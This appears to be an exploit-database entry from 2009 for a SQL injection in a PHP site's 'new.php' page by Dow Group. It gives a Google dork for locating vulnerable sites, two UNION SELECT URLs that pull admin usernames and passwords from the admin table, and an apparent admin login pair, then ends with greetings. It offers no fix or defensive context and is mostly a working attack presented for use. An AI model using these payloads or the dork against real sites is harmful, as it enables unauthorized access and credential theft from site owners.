Dow Group - 'new.php' SQL Injection
Author: ProF.Code
type: webapps
platform: php
port:
date_added: 2009-11-15
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
=====================================
| Dow Group admin by pass (new.php)
=====================================
Author:ProF.Code
Email :adt@hotmail.com
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"powered and designed by Dow Group"
~~~~~~~~~~~~~~~~~~~~
demo (username): http://server/new.php?id=-9+union+select+1,user_name,3,4+from+admin
demo (password) : http://server/new.php?id=-9+union+select+1,password,3,4+from+admin
user : nabadmin
pass : nabadmin_123
=============================================================
#====GreeTZ===============#
#all my friends in my email #
#======================#